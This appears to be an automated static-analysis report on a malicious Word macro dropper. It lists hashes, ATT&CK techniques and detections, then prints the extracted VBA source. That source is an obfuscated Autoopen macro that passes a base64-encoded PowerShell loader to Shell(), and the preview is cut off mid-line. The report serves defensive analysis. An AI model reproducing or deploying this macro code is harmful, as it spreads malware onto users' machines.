Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2094db722ec4fc39…

MALICIOUS

Office (OLE)

Size: 82.0 KB
Created: 2018-06-07 12:31:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 4f7f540a2e67c5198039b15a93ee6b10
SHA-1: 1e79edaf0025e3b6736ee086bca07cd2fb4fb8d2
SHA-256: 2094db722ec4fc390788b50f1f913ceab5402a57b0c974f243054f8ec5440e3e
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro and a Shell() call within the VBA code indicate that the macro is designed to execute arbitrary commands. The script attempts to construct a command string, likely for downloading and executing a secondary payload, which is a common dropper behavior.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6576135-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576135-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 3 related findings
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11150 bytes
SHA-256: c9e2914a08625673da5590f498a8c9aa3d42286b3126c2b24a1d875db1a5a391

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "JEJiMOkwlw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UAEGdc()
On Error Resume Next
PLLUh = Tan(BSHiP _
* Tan(jNOWM * Int(WEYKw * Sqr(38056) / FpoQB + Fix(47641)) / 52620 * Round(24630 / Log(25352 - wbWTn) + 11868 - STCWi)) _
/ 15883 + Log(5196))
KnnYz = Tan(Prwci _
* Tan(CFJnq * Int(vSvpo * Sqr(67651) / AscRBa + Fix(64249)) / 72790 * Round(18392 / Log(82801 - noPNhk) + 51543 - EtUMKO)) _
/ 60690 + Log(22095))
UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596)
kLUzE = Tan(wNmZu _
* Tan(BbsOX * Int(CDilKP * Sqr(93771) / FjjSDW + Fix(28579)) / 39361 * Round(2979 / Log(96300 - mjPTA) + 89481 - jpCSb)) _
/ 94558 + Log(73872))
End Function
Sub Autoopen()
On Error Resume Next
dIizA = Tan(CZTQj _
* Tan(WYnhZ * Int(slQmji * Sqr(82006) / iHcnEj + Fix(61194)) / 77994 * Round(85644 / Log(12803 - CzQkKv) + 6933 - aoHBV)) _
/ 85897 + Log(63424))
UAEGdc
AwqYw = Tan(BWuzj _
* Tan(zohjj * Int(XzcBGr * Sqr(61492) / QLbFG + Fix(89604)) / 44842 * Round(59231 / Log(59639 - Bistwt) + 79220 - OrVlG)) _
/ 52929 + Log(40948))
End Sub



Attribute VB_Name = "Vjbzszshrpv"
Function aQIksruGT()
On Error Resume Next
tWsDR = Tan(VXBow _
* Tan(NWChE * Int(drKwj * Sqr(52804) / TrEwz + Fix(12592)) / 68338 * Round(48023 / Log(19723 - tFdFO) + 19736 - YHjJE)) _
/ 876 + Log(37312))
hjKYw = "owers" + "HeLL " + "-e KAAgA" + "E4ARQB3" + "AC0ATwB"
VVsjz = Tan(qRlwSQ _
* Tan(ChMAD * Int(IbawP * Sqr(63969) / YZrIOq + Fix(71025)) / 96420 * Round(58661 / Log(71929 - pMRDos) + 14182 - toWZWJ)) _
/ 1439 + Log(84828))
mwZiTEvvnT = "iAGoAZQB" + "DAFQAIABpA" + "E8ALgBzAHQ" + "AUgB" + "lAEEAbQBSAE" + "UAQ" + "QBEAGUAUgAoACA" + "AKAAgAE4ARQB3" + "AC0" + "AT"
ZuWcC = Tan(YQZcj _
* Tan(faXwVL * Int(qFmhrT * Sqr(76610) / BzUzN + Fix(97273)) / 50273 * Round(48334 / Log(69369 - OnMsm) + 29438 - XTNNw)) _
/ 56608 + Log(1976))
CUMLD = "wB" + "iAGoAZQBDAFQ" + "AIAAgAGkATwAu" + "AEMATwBNAFAA"
KBFmMf = Tan(OsXRE _
* Tan(VdFBnh * Int(XizSX * Sqr(34155) / AauCW + Fix(38344)) / 3121 * Round(7298 / Log(94444 - mXjFZ) + 38463 - VKnCq)) _
/ 14936 + Log(22598))
pBGihKDKCi = "cgBlA" + "HMAcwBJAG8ATg" + "AuA" + "EQARQBGAEwAQQB" + "UAGUAc" + "wB0AFIARQBhAE0" + "AKABbAFMA" + "WQBzAFQ"
wtafD = Tan(OuLInz _
* Tan(vkbRj * Int(OQzBwK * Sqr(54450) / MiRKSi + Fix(84014)) / 49940 * Round(50535 / Log(52106 - thYcY) + 94717 - WBZaLk)) _
/ 18746 + Log(43291))
oSjGYmwLjB = "ARQBNAC4Aa" + "QB" + "PAC4ATQBFAG0Ab" + "wByAH" + "kAcwB0AHIAZQBhA" + "G0AXQBbAE" + "MATwBuAFYAZ" + "QByAFQAXQ"
vwrcVb = Tan(BQuzVP _
* Tan(VKAtmD * Int(nYEMob * Sqr(45356) / ShAwlw + Fix(52411)) / 66167 * Round(97741 / Log(4824 - rWMiz) + 30562 - YEQLq)) _
/ 44044 + Log(35994))
fPwMuMUzwwS = "A6ADoAZgBSAG8" + "ATQBiAEEA" + "cwBlADYANA" + "BzAHQA" + "UgBpAG4A"
aQIksruGT = hjKYw + mwZiTEvvnT + CUMLD + pBGihKDKCi + oSjGYmwLjB + fPwMuMUzwwS
End Function
Function mtskklTjMNB()
On Error Resume Next
HZnPh = Tan(SPzMz _
* Tan(djubB * Int(ULUauF * Sqr(94372) / CTWGqd + Fix(56394)) / 60854 * Round(78280 / Log(2684 - jVSZGO) + 33637 - qisKo)) _
/ 19793 + Log(98052))
MjJzzQjfnLq = "ZwAoAC" + "AAJwBYAFoAQgB" + "kA" + "FQAOABJAHcAR"
Gmhfi = Tan(Azwtq _
* Tan(Twzrs * Int(RWCmNL * Sqr(55650) / GCKIh + Fix(93656)) / 84208 * Round(52986 / Log(43425 - HVMRUU) + 51648 - Yviuj)) _
/ 1578 + Log(33820))
rrVQLmsFawQ = "gBJAGIALwBTAG" + "kAKw" + "BXAE" + "QAS" + "wBLADA" + "AZwBzAFEAbw" + "BpADQAawBp" + "AG8ATQBhAGgAR" + "QBCAEMA"
sczUY = Tan(CfLzm _
* Tan(LtirZD * Int(WTABiL * Sqr(595) / hUMWJr + Fix(50747)) / 8234 * Round(28979 / Log(53824 - VmThF) + 44394 - kBiQqV)) _
/ 55478 + Log(32768))
RNVGQRHSnw = "TQBNAF" + "QA" + "RgB" + "kAGQAO" + "ABhA" + "EsAVwA3AH" + "QAMABoADIAMQB" + "JA" + "CsATwA4AFcAUQBT"
nrbRJY = Tan(UKzbdw _
* Tan(pPPXiz * Int(muiAa * Sqr(97312) / 
... (truncated)